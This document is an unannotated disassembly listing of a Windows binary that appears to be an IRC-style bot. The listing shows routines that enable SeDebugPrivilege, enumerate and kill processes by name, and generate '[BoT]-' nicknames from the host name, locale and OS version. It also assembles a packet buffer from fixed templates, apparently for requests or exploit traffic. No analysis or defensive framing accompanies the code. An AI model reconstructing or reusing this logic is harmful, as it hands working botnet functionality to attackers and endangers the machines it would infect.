sub_40F515 proc near ; CODE XREF: sub_405D52+D0�p
; sub_405D52+5B6�p ...
hObject = dword ptr -18h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
and [ebp+var_4], 0
lea eax, [ebp+hObject]
push eax
push 28h
call ds:GetCurrentProcess ; GetCurrentProcess
push eax
call dword_42640C ; OpenProcessToken
test eax, eax
jnz short loc_40F53B
mov eax, [ebp+var_4]
jmp short locret_40F5A5
; ---------------------------------------------------------------------------
loc_40F53B: ; CODE XREF: sub_40F515+1F�j
lea eax, [ebp+var_10]
push eax
push [ebp+arg_0]
push 0
call dword_4263EC ; LookupPrivilegeValueA
test eax, eax
jnz short loc_40F55C
push [ebp+hObject] ; hObject
call ds:CloseHandle ; CloseHandle
mov eax, [ebp+var_4]
jmp short locret_40F5A5
; ---------------------------------------------------------------------------
loc_40F55C: ; CODE XREF: sub_40F515+37�j
mov [ebp+var_14], 1
cmp [ebp+arg_4], 0
jz short loc_40F573
mov eax, [ebp+var_8]
or al, 2
mov [ebp+var_8], eax
jmp short loc_40F581
; ---------------------------------------------------------------------------
loc_40F573: ; CODE XREF: sub_40F515+52�j
mov eax, [ebp+var_8]
and eax, 2
mov ecx, [ebp+var_8]
xor ecx, eax
mov [ebp+var_8], ecx
loc_40F581: ; CODE XREF: sub_40F515+5C�j
push 0
push 0
push 0
lea eax, [ebp+var_14]
push eax
push 0
push [ebp+hObject]
call dword_42648C ; AdjustTokenPrivileges
mov [ebp+var_4], eax
push [ebp+hObject] ; hObject
call ds:CloseHandle ; CloseHandle
mov eax, [ebp+var_4]
locret_40F5A5: ; CODE XREF: sub_40F515+24�j
; sub_40F515+45�j
leave
retn
sub_40F515 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40F5A7(int, int, int, char *Str2, int, int)
sub_40F5A7 proc near ; CODE XREF: sub_40ABFE+3245�p
; sub_40F7C9+7D�p
var_554 = dword ptr -554h
var_550 = byte ptr -550h
var_434 = byte ptr -434h
Dest = byte ptr -330h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = byte ptr -128h
dwProcessId = dword ptr -124h
Str1 = byte ptr -108h
hObject = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
Str2 = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 554h
push edi
and [ebp+var_12C], 0
push 49h
pop ecx
xor eax, eax
lea edi, [ebp+var_128]
rep stosd
and [ebp+var_554], 0
mov ecx, 88h
xor eax, eax
lea edi, [ebp+var_550]
rep stosd
cmp dword_426444, 0
jz loc_40F7C4
cmp dword_426428, 0
jz loc_40F7C4
cmp dword_42636C, 0
jz loc_40F7C4
push 1
push offset aSedebugprivi_1 ; "SeDebugPrivilege"
call sub_40F515
pop ecx
pop ecx
push 0
push 0Fh
call dword_426444 ; CreateToolhelp32Snapshot
mov [ebp+var_130], eax
cmp [ebp+var_130], 0FFFFFFFFh
jz loc_40F7B6
mov [ebp+var_12C], 128h
lea eax, [ebp+var_12C]
push eax
push [ebp+var_130]
call dword_426428 ; Process32First
test eax, eax
jz loc_40F7AA
loc_40F652: ; CODE XREF: sub_40F5A7:loc_40F7A5�j
lea eax, [ebp+var_12C]
push eax
push [ebp+var_130]
call dword_42636C ; Process32Next
test eax, eax
jz loc_40F7AA
cmp [ebp+arg_10], 0
jz short loc_40F678
jmp loc_40F7A5
; ---------------------------------------------------------------------------
loc_40F678: ; CODE XREF: sub_40F5A7+CA�j
cmp [ebp+Str2], 0
jnz loc_40F74D
cmp [ebp+arg_4], 0
jz loc_40F74B
push [ebp+dwProcessId]
push 8
call dword_426444 ; CreateToolhelp32Snapshot
mov [ebp+hObject], eax
mov [ebp+var_554], 224h
cmp [ebp+arg_14], 0
jz short loc_40F707
lea eax, [ebp+var_554]
push eax
push [ebp+hObject]
call dword_42632C ; Module32First
test eax, eax
jz short loc_40F6E4
push [ebp+dwProcessId]
lea eax, [ebp+var_434]
push eax
push offset aSD_0 ; " %s (%d)"
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 10h
jmp short loc_40F705
; ---------------------------------------------------------------------------
loc_40F6E4: ; CODE XREF: sub_40F5A7+118�j
push [ebp+dwProcessId]
lea eax, [ebp+Str1]
push eax
push offset aSD_1 ; " %s (%d)"
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 10h
loc_40F705: ; CODE XREF: sub_40F5A7+13B�j
jmp short loc_40F728
; ---------------------------------------------------------------------------
loc_40F707: ; CODE XREF: sub_40F5A7+104�j
push [ebp+dwProcessId]
lea eax, [ebp+Str1]
push eax
push offset aSD_2 ; " %s (%d)"
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 10h
loc_40F728: ; CODE XREF: sub_40F5A7:loc_40F705�j
push 1
push [ebp+arg_8]
lea eax, [ebp+Dest]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40A08D
add esp, 14h
push [ebp+hObject] ; hObject
call ds:CloseHandle ; CloseHandle
loc_40F74B: ; CODE XREF: sub_40F5A7+DF�j
jmp short loc_40F7A5
; ---------------------------------------------------------------------------
loc_40F74D: ; CODE XREF: sub_40F5A7+D5�j
push [ebp+Str2] ; Str2
lea eax, [ebp+Str1]
push eax ; Str1
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40F7A5
push [ebp+dwProcessId] ; dwProcessId
push 0 ; bInheritHandle
push 1F0FFFh ; dwDesiredAccess
call ds:OpenProcess ; OpenProcess
mov [ebp+hObject], eax
push [ebp+var_130] ; hObject
call ds:CloseHandle ; CloseHandle
push 0 ; uExitCode
push [ebp+hObject] ; hProcess
call ds:TerminateProcess ; TerminateProcess
test eax, eax
jnz short loc_40F7A0
push [ebp+hObject] ; hObject
call ds:CloseHandle ; CloseHandle
xor eax, eax
jmp short loc_40F7C6
; ---------------------------------------------------------------------------
loc_40F7A0: ; CODE XREF: sub_40F5A7+1EA�j
push 1
pop eax
jmp short loc_40F7C6
; ---------------------------------------------------------------------------
loc_40F7A5: ; CODE XREF: sub_40F5A7+CC�j
; sub_40F5A7:loc_40F74B�j ...
jmp loc_40F652
; ---------------------------------------------------------------------------
loc_40F7AA: ; CODE XREF: sub_40F5A7+A5�j
; sub_40F5A7+C0�j
push [ebp+var_130] ; hObject
call ds:CloseHandle ; CloseHandle
loc_40F7B6: ; CODE XREF: sub_40F5A7+80�j
push 0
push offset aSedebugprivi_2 ; "SeDebugPrivilege"
call sub_40F515
pop ecx
pop ecx
loc_40F7C4: ; CODE XREF: sub_40F5A7+3B�j
; sub_40F5A7+48�j ...
xor eax, eax
loc_40F7C6: ; CODE XREF: sub_40F5A7+1F7�j
; sub_40F5A7+1FC�j
pop edi
leave
retn
sub_40F5A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; DWORD __stdcall sub_40F7C9(LPVOID)
sub_40F7C9 proc near ; DATA XREF: sub_40ABFE+2390�o
Dest = byte ptr -29Ch
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 29Ch
push esi
push edi
mov esi, [ebp+arg_0]
push 26h
pop ecx
lea edi, [ebp+var_9C]
rep movsd
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov dword ptr [eax+94h], 1
push offset unk_423770 ; Format
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
cmp [ebp+var_C], 0
jnz short loc_40F82F
push 0
push [ebp+var_10]
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_98]
push eax
push [ebp+var_9C]
call sub_40A08D
add esp, 14h
loc_40F82F: ; CODE XREF: sub_40F7C9+43�j
push [ebp+var_14] ; int
push 0 ; int
push 0 ; Str2
push [ebp+var_10] ; int
lea eax, [ebp+var_98]
push eax ; int
push [ebp+var_9C] ; int
call sub_40F5A7
add esp, 18h
test eax, eax
jnz short loc_40F867
push offset unk_4237A4 ; Format
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
jmp short loc_40F87A
; ---------------------------------------------------------------------------
loc_40F867: ; CODE XREF: sub_40F7C9+87�j
push offset unk_4237DC ; Format
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_40F87A: ; CODE XREF: sub_40F7C9+9C�j
cmp [ebp+var_C], 0
jnz short loc_40F8A1
push 0
push [ebp+var_10]
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_98]
push eax
push [ebp+var_9C]
call sub_40A08D
add esp, 14h
loc_40F8A1: ; CODE XREF: sub_40F7C9+B5�j
lea eax, [ebp+Dest]
push eax
call sub_40913D
pop ecx
push [ebp+var_18]
call sub_410709
pop ecx
push 0 ; dwExitCode
call ds:ExitThread ; ExitThread
sub_40F7C9 endp
; ---------------------------------------------------------------------------
pop edi
pop esi
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40F8C5(DWORD dwProcessId)
sub_40F8C5 proc near ; CODE XREF: sub_40ABFE+3323�p
; sub_4103E7+A0�p
hObject = dword ptr -8
var_4 = dword ptr -4
dwProcessId = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov [ebp+var_4], 1
push [ebp+dwProcessId] ; dwProcessId
push 0 ; bInheritHandle
push 1F0FFFh ; dwDesiredAccess
call ds:OpenProcess ; OpenProcess
mov [ebp+hObject], eax
cmp [ebp+hObject], 0
jz short loc_40F906
push 0 ; uExitCode
push [ebp+hObject] ; hProcess
call ds:TerminateProcess ; TerminateProcess
test eax, eax
jnz short loc_40F906
and [ebp+var_4], 0
push [ebp+hObject] ; hObject
call ds:CloseHandle ; CloseHandle
loc_40F906: ; CODE XREF: sub_40F8C5+23�j
; sub_40F8C5+32�j
mov eax, [ebp+var_4]
leave
retn
sub_40F8C5 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+0Ch]
sub eax, [ebp+8]
mov [ebp-4], eax
fild dword ptr [ebp-4]
fstp dword ptr [ebp-8]
call _rand
mov [ebp-0Ch], eax
fild dword ptr [ebp-0Ch]
fmul dword ptr [ebp-8]
fdiv ds:dbl_41C258
call __ftol
add eax, [ebp+8]
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
call _rand
cdq
idiv dword ptr [ebp+8]
mov eax, edx
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40F94E(char *Dest)
sub_40F94E proc near ; CODE XREF: sub_40FD9A+64�p
; DATA XREF: .data:off_423828�o
var_4 = dword ptr -4
Dest = dword ptr 8
push ebp
mov ebp, esp
push ecx
call ds:GetTickCount ; GetTickCount
push eax
call sub_412333
pop ecx
push offset aBot ; "[BoT]-"
push offset aS_4 ; "%s"
push 1Ch ; Count
push [ebp+Dest] ; Dest
call __snprintf
add esp, 10h
and [ebp+var_4], 0
jmp short loc_40F983
; ---------------------------------------------------------------------------
loc_40F97C: ; CODE XREF: sub_40F94E+61�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40F983: ; CODE XREF: sub_40F94E+2C�j
mov eax, [ebp+var_4]
cmp eax, dword_421C48
jge short loc_40F9B1
call _rand
cdq
push 0Ah
pop ecx
idiv ecx
push edx
push [ebp+Dest]
push offset aSI ; "%s%i"
push 1Ch ; Count
push [ebp+Dest] ; Dest
call __snprintf
add esp, 14h
jmp short loc_40F97C
; ---------------------------------------------------------------------------
loc_40F9B1: ; CODE XREF: sub_40F94E+3E�j
mov eax, [ebp+Dest]
leave
retn
sub_40F94E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F9B6 proc near ; CODE XREF: sub_40ABFE+3B05�p
; DATA XREF: .data:0042383C�o
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
call ds:GetTickCount ; GetTickCount
push eax
call sub_412333
pop ecx
call _rand
cdq
push 3
pop ecx
idiv ecx
add edx, dword_421C48
mov [ebp+var_8], edx
and [ebp+var_4], 0
jmp short loc_40F9E9
; ---------------------------------------------------------------------------
loc_40F9E2: ; CODE XREF: sub_40F9B6+51�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40F9E9: ; CODE XREF: sub_40F9B6+2A�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jge short loc_40FA09
call _rand
cdq
push 1Ah
pop ecx
idiv ecx
add edx, 61h
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov [eax], dl
jmp short loc_40F9E2
; ---------------------------------------------------------------------------
loc_40FA09: ; CODE XREF: sub_40F9B6+39�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
and byte ptr [eax], 0
mov eax, [ebp+arg_0]
leave
retn
sub_40F9B6 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 10h
mov dword ptr [ebp-8], offset aPc ; "PC"
mov dword ptr [ebp-4], 100h
and dword ptr [ebp-10h], 0
call ds:GetTickCount ; GetTickCount
push eax
call sub_412333
pop ecx
lea eax, [ebp-4]
push eax
push dword ptr [ebp-8]
call ds:GetComputerNameA ; GetComputerNameA
test eax, eax
jnz short loc_40FA54
mov dword ptr [ebp-8], offset aPc_0 ; "PC"
loc_40FA54: ; CODE XREF: .text:0040FA4B�j
mov dword ptr [ebp-0Ch], 41h
jmp short loc_40FA64
; ---------------------------------------------------------------------------
loc_40FA5D: ; CODE XREF: .text:loc_40FA7C�j
mov eax, [ebp-0Ch]
inc eax
mov [ebp-0Ch], eax
loc_40FA64: ; CODE XREF: .text:0040FA5B�j
cmp dword ptr [ebp-0Ch], 5Bh
jge short loc_40FA7E
mov eax, [ebp-8]
movsx eax, byte ptr [eax]
cmp eax, [ebp-0Ch]
jnz short loc_40FA7C
mov dword ptr [ebp-10h], 1
loc_40FA7C: ; CODE XREF: .text:0040FA73�j
jmp short loc_40FA5D
; ---------------------------------------------------------------------------
loc_40FA7E: ; CODE XREF: .text:0040FA68�j
mov dword ptr [ebp-0Ch], 61h
jmp short loc_40FA8E
; ---------------------------------------------------------------------------
loc_40FA87: ; CODE XREF: .text:loc_40FAA6�j
mov eax, [ebp-0Ch]
inc eax
mov [ebp-0Ch], eax
loc_40FA8E: ; CODE XREF: .text:0040FA85�j
cmp dword ptr [ebp-0Ch], 7Bh
jge short loc_40FAA8
mov eax, [ebp-8]
movsx eax, byte ptr [eax]
cmp eax, [ebp-0Ch]
jnz short loc_40FAA6
mov dword ptr [ebp-10h], 1
loc_40FAA6: ; CODE XREF: .text:0040FA9D�j
jmp short loc_40FA87
; ---------------------------------------------------------------------------
loc_40FAA8: ; CODE XREF: .text:0040FA92�j
cmp dword ptr [ebp-10h], 0
jnz short loc_40FAB5
mov dword ptr [ebp-8], offset aPc_1 ; "PC"
loc_40FAB5: ; CODE XREF: .text:0040FAAC�j
push dword ptr [ebp-8]
push 1Ch
push dword ptr [ebp+8]
call __snprintf
add esp, 0Ch
and dword ptr [ebp-0Ch], 0
jmp short loc_40FAD2
; ---------------------------------------------------------------------------
loc_40FACB: ; CODE XREF: .text:0040FAFE�j
mov eax, [ebp-0Ch]
inc eax
mov [ebp-0Ch], eax
loc_40FAD2: ; CODE XREF: .text:0040FAC9�j
mov eax, [ebp-0Ch]
cmp eax, dword_421C48
jge short loc_40FB00
call _rand
cdq
push 0Ah
pop ecx
idiv ecx
push edx
push dword ptr [ebp+8]
push offset aSI_0 ; "%s%i"
push 1Ch
push dword ptr [ebp+8]
call __snprintf
add esp, 14h
jmp short loc_40FACB
; ---------------------------------------------------------------------------
loc_40FB00: ; CODE XREF: .text:0040FADB�j
mov eax, [ebp+8]
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 10h
call ds:GetTickCount ; GetTickCount
push eax
call sub_412333
pop ecx
push 0Ah
lea eax, [ebp-0Ch]
push eax
push 7
push 800h
call ds:GetLocaleInfoA ; GetLocaleInfoA
lea eax, [ebp-0Ch]
push eax
push offset aS_3 ; "%s|"
push 1Ch
push dword ptr [ebp+8]
call __snprintf
add esp, 10h
and dword ptr [ebp-10h], 0
jmp short loc_40FB4E
; ---------------------------------------------------------------------------
loc_40FB47: ; CODE XREF: .text:0040FB7A�j
mov eax, [ebp-10h]
inc eax
mov [ebp-10h], eax
loc_40FB4E: ; CODE XREF: .text:0040FB45�j
mov eax, [ebp-10h]
cmp eax, dword_421C48
jge short loc_40FB7C
call _rand
cdq
push 0Ah
pop ecx
idiv ecx
push edx
push dword ptr [ebp+8]
push offset aSI_1 ; "%s%i"
push 1Ch
push dword ptr [ebp+8]
call __snprintf
add esp, 14h
jmp short loc_40FB47
; ---------------------------------------------------------------------------
loc_40FB7C: ; CODE XREF: .text:0040FB57�j
mov eax, [ebp+8]
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0ACh
mov dword ptr [ebp-8], offset dword_470270
mov dword ptr [ebp-4], offset dword_470274
mov dword ptr [ebp-0ACh], 94h
lea eax, [ebp-0ACh]
push eax
call ds:GetVersionExA ; GetVersionExA
cmp dword ptr [ebp-0A8h], 4
jnz short loc_40FBE6
cmp dword ptr [ebp-0A4h], 0
jnz short loc_40FBE6
cmp dword ptr [ebp-9Ch], 1
jnz short loc_40FBD1
mov dword ptr [ebp-8], offset a95_0 ; "95"
loc_40FBD1: ; CODE XREF: .text:0040FBC8�j
cmp dword ptr [ebp-9Ch], 2
jnz short loc_40FBE1
mov dword ptr [ebp-8], offset aNt_0 ; "NT"
loc_40FBE1: ; CODE XREF: .text:0040FBD8�j
jmp loc_40FC74
; ---------------------------------------------------------------------------
loc_40FBE6: ; CODE XREF: .text:0040FBB6�j
; .text:0040FBBF�j
cmp dword ptr [ebp-0A8h], 4
jnz short loc_40FC01
cmp dword ptr [ebp-0A4h], 0Ah
jnz short loc_40FC01
mov dword ptr [ebp-8], offset a98_0 ; "98"
jmp short loc_40FC74
; ---------------------------------------------------------------------------
loc_40FC01: ; CODE XREF: .text:0040FBED�j
; .text:0040FBF6�j
cmp dword ptr [ebp-0A8h], 4
jnz short loc_40FC1C
cmp dword ptr [ebp-0A4h], 5Ah
jnz short loc_40FC1C
mov dword ptr [ebp-8], offset aMe_1 ; "ME"
jmp short loc_40FC74
; ---------------------------------------------------------------------------
loc_40FC1C: ; CODE XREF: .text:0040FC08�j
; .text:0040FC11�j
cmp dword ptr [ebp-0A8h], 5
jnz short loc_40FC37
cmp dword ptr [ebp-0A4h], 0
jnz short loc_40FC37
mov dword ptr [ebp-8], offset a2k_0 ; "2K"
jmp short loc_40FC74
; ---------------------------------------------------------------------------
loc_40FC37: ; CODE XREF: .text:0040FC23�j
; .text:0040FC2C�j
cmp dword ptr [ebp-0A8h], 5
jnz short loc_40FC52
cmp dword ptr [ebp-0A4h], 1
jnz short loc_40FC52
mov dword ptr [ebp-8], offset aXp_0 ; "XP"
jmp short loc_40FC74
; ---------------------------------------------------------------------------
loc_40FC52: ; CODE XREF: .text:0040FC3E�j
; .text:0040FC47�j
cmp dword ptr [ebp-0A8h], 5
jnz short loc_40FC6D
cmp dword ptr [ebp-0A4h], 2
jnz short loc_40FC6D
mov dword ptr [ebp-8], offset a23 ; "23"
jmp short loc_40FC74
; ---------------------------------------------------------------------------
loc_40FC6D: ; CODE XREF: .text:0040FC59�j
; .text:0040FC62�j
mov dword ptr [ebp-8], offset aUn ; "UN"
loc_40FC74: ; CODE XREF: .text:loc_40FBE1�j
; .text:0040FBFF�j ...
push offset dword_470278
lea eax, [ebp-98h]
push eax
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40FC97
mov dword ptr [ebp-4], offset aSp0 ; "SP0"
jmp loc_40FD1E
; ---------------------------------------------------------------------------
loc_40FC97: ; CODE XREF: .text:0040FC89�j
push offset a1 ; "1"
lea eax, [ebp-98h]
push eax
call _strstr
pop ecx
pop ecx
test eax, eax
jz short loc_40FCB7
mov dword ptr [ebp-4], offset aSp1 ; "SP1"
jmp short loc_40FD1E
; ---------------------------------------------------------------------------
loc_40FCB7: ; CODE XREF: .text:0040FCAC�j
push offset a2 ; "2"
lea eax, [ebp-98h]
push eax
call _strstr
pop ecx
pop ecx
test eax, eax
jz short loc_40FCD7
mov dword ptr [ebp-4], offset aSp2 ; "SP2"
jmp short loc_40FD1E
; ---------------------------------------------------------------------------
loc_40FCD7: ; CODE XREF: .text:0040FCCC�j
push offset a3 ; "3"
lea eax, [ebp-98h]
push eax
call _strstr
pop ecx
pop ecx
test eax, eax
jz short loc_40FCF7
mov dword ptr [ebp-4], offset aSp3 ; "SP3"
jmp short loc_40FD1E
; ---------------------------------------------------------------------------
loc_40FCF7: ; CODE XREF: .text:0040FCEC�j
push offset a4 ; "4"
lea eax, [ebp-98h]
push eax
call _strstr
pop ecx
pop ecx
test eax, eax
jz short loc_40FD17
mov dword ptr [ebp-4], offset aSp4 ; "SP4"
jmp short loc_40FD1E
; ---------------------------------------------------------------------------
loc_40FD17: ; CODE XREF: .text:0040FD0C�j
mov dword ptr [ebp-4], offset aUnk ; "UNK"
loc_40FD1E: ; CODE XREF: .text:0040FC92�j
; .text:0040FCB5�j ...
call ds:GetTickCount ; GetTickCount
push eax
call sub_412333
pop ecx
push 0Ah
lea eax, [ebp-14h]
push eax
push 7
push 800h
call ds:GetLocaleInfoA ; GetLocaleInfoA
push dword ptr [ebp-4]
push dword ptr [ebp-8]
lea eax, [ebp-14h]
push eax
push offset aSSS_0 ; "%s|%s|%s|"
push 1Ch
push dword ptr [ebp+8]
call __snprintf
add esp, 18h
and dword ptr [ebp-18h], 0
jmp short loc_40FD67
; ---------------------------------------------------------------------------
loc_40FD60: ; CODE XREF: .text:0040FD93�j
mov eax, [ebp-18h]
inc eax
mov [ebp-18h], eax
loc_40FD67: ; CODE XREF: .text:0040FD5E�j
mov eax, [ebp-18h]
cmp eax, dword_421C48
jge short loc_40FD95
call _rand
cdq
push 0Ah
pop ecx
idiv ecx
push edx
push dword ptr [ebp+8]
push offset aSI_2 ; "%s%i"
push 1Ch
push dword ptr [ebp+8]
call __snprintf
add esp, 14h
jmp short loc_40FD60
; ---------------------------------------------------------------------------
loc_40FD95: ; CODE XREF: .text:0040FD70�j
mov eax, [ebp+8]
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40FD9A(char *Dest, int, char *Str1)
sub_40FD9A proc near ; CODE XREF: sub_40A776+AF�p
; sub_40A9EB+71�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
Dest = dword ptr 8
arg_4 = dword ptr 0Ch
Str1 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
jmp short loc_40FDAC
; ---------------------------------------------------------------------------
loc_40FDA5: ; CODE XREF: sub_40FD9A:loc_40FE07�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40FDAC: ; CODE XREF: sub_40FD9A+9�j
cmp [ebp+var_4], 3
jnb short loc_40FE09
cmp [ebp+Str1], 0
jz short loc_40FDD8
mov eax, [ebp+var_4]
imul eax, 14h
add eax, offset aConst ; "const"
push eax ; Str2
push [ebp+Str1] ; Str1
call _strcmp
pop ecx
pop ecx
neg eax
sbb eax, eax
inc eax
mov [ebp+var_8], eax
jmp short loc_40FDEF
; ---------------------------------------------------------------------------
loc_40FDD8: ; CODE XREF: sub_40FD9A+1C�j
mov eax, [ebp+var_4]
imul eax, 14h
mov eax, dword_423824[eax]
sub eax, [ebp+arg_4]
neg eax
sbb eax, eax
inc eax
mov [ebp+var_8], eax
loc_40FDEF: ; CODE XREF: sub_40FD9A+3C�j
cmp [ebp+var_8], 0
jz short loc_40FE07
push [ebp+Dest] ; Dest
mov eax, [ebp+var_4]
imul eax, 14h
call off_423828[eax]
pop ecx
jmp short loc_40FE09
; ---------------------------------------------------------------------------
loc_40FE07: ; CODE XREF: sub_40FD9A+59�j
jmp short loc_40FDA5
; ---------------------------------------------------------------------------
loc_40FE09: ; CODE XREF: sub_40FD9A+16�j
; sub_40FD9A+6B�j
mov eax, [ebp+Dest]
leave
retn
sub_40FD9A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40FE0E(char *Str, int)
sub_40FE0E proc near ; CODE XREF: sub_40FE3E+C�p
; sub_40FFA4+9�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
Str = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push [ebp+Str] ; Str
call _strlen
pop ecx
mov [ebp+var_8], eax
push [ebp+arg_4] ; Str
call _strlen
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax+79h]
mov ecx, [ebp+var_4]
lea eax, [eax+ecx+48h]
leave
retn
sub_40FE0E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40FE3E(int, int, void *Str, int)
sub_40FE3E proc near ; CODE XREF: sub_40FFBD+62�p
Size = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
Str = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
push [ebp+arg_C] ; int
push [ebp+Str] ; Str
call sub_40FE0E
pop ecx
pop ecx
mov [ebp+var_14], eax
mov eax, [ebp+var_14]
cmp eax, [ebp+arg_4]
jbe short loc_40FE63
xor eax, eax
jmp locret_40FFA2
; ---------------------------------------------------------------------------
loc_40FE63: ; CODE XREF: sub_40FE3E+1C�j
push [ebp+Str] ; Str
call _strlen
pop ecx
mov [ebp+Size], eax
push [ebp+arg_C] ; Str
call _strlen
pop ecx
mov [ebp+var_1C], eax
mov [ebp+var_8], offset dword_423970
mov eax, [ebp+var_1C]
mov ecx, [ebp+Size]
lea eax, [ecx+eax+12h]
mov ecx, [ebp+var_8]
mov [ecx], eax
mov [ebp+var_C], offset byte_423991
mov eax, [ebp+var_1C]
inc eax
mov ecx, [ebp+var_C]
mov [ecx], eax
mov [ebp+var_10], offset byte_423989
mov eax, [ebp+var_1C]
add eax, 17h
mov ecx, [ebp+var_10]
mov [ecx], eax
mov [ebp+var_4], offset byte_42399F
push 0FFFFFFEDh
pop eax
sub eax, [ebp+var_1C]
mov ecx, [ebp+var_4]
mov [ecx], eax
and [ebp+var_18], 0
push 74h ; Size
push offset dword_42390C ; Src
mov eax, [ebp+arg_0]
add eax, [ebp+var_18]
push eax ; Dst
call _memcpy
add esp, 0Ch
mov eax, [ebp+var_18]
add eax, 74h
mov [ebp+var_18], eax
push [ebp+Size] ; Size
push [ebp+Str] ; Src
mov eax, [ebp+arg_0]
add eax, [ebp+var_18]
push eax ; Dst
call _memcpy
add esp, 0Ch
mov eax, [ebp+var_18]
add eax, [ebp+Size]
mov [ebp+var_18], eax
push 5 ; Size
push offset aGet ; " get "
mov eax, [ebp+arg_0]
add eax, [ebp+var_18]
push eax ; Dst
call _memcpy
add esp, 0Ch
mov eax, [ebp+var_18]
add eax, 5
mov [ebp+var_18], eax
push [ebp+var_1C] ; Size
push [ebp+arg_C] ; Src
mov eax, [ebp+arg_0]
add eax, [ebp+var_18]
push eax ; Dst
call _memcpy
add esp, 0Ch
mov eax, [ebp+var_18]
add eax, [ebp+var_1C]
mov [ebp+var_18], eax
push 10h ; Size
push (offset aGet+5) ; Src
mov eax, [ebp+arg_0]
add eax, [ebp+var_18]
push eax ; Dst
call _memcpy
add esp, 0Ch
mov eax, [ebp+var_18]
add eax, 10h
mov [ebp+var_18], eax
push [ebp+var_1C] ; Size
push [ebp+arg_C] ; Src
mov eax, [ebp+arg_0]
add eax, [ebp+var_18]
push eax ; Dst
call _memcpy
add esp, 0Ch
mov eax, [ebp+var_18]
add eax, [ebp+var_1C]
mov [ebp+var_18], eax
push 38h ; Size
push offset byte_423995 ; Src
mov eax, [ebp+arg_0]
add eax, [ebp+var_18]
push eax ; Dst
call _memcpy
add esp, 0Ch
mov eax, [ebp+var_18]
add eax, 38h
mov [ebp+var_18], eax
mov eax, [ebp+var_14]
locret_40FFA2: ; CODE XREF: sub_40FE3E+20�j
leave
retn
sub_40FE3E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40FFA4(char *Str, int)
sub_40FFA4 proc near ; CODE XREF: sub_40FFBD+C�p
Str = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push [ebp+arg_4] ; int
push [ebp+Str] ; Str
call sub_40FE0E
pop ecx
pop ecx
push eax
call sub_41004F
pop ecx
pop ebp
retn
sub_40FFA4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40FFBD(void *Dst, int, char *Str, int)
sub_40FFBD proc near ; CODE XREF: sub_4011CD+4B�p
var_C = dword ptr -0Ch
Memory = dword ptr -8
var_4 = dword ptr -4
Dst = dword ptr 8
arg_4 = dword ptr 0Ch
Str = dword ptr 10h
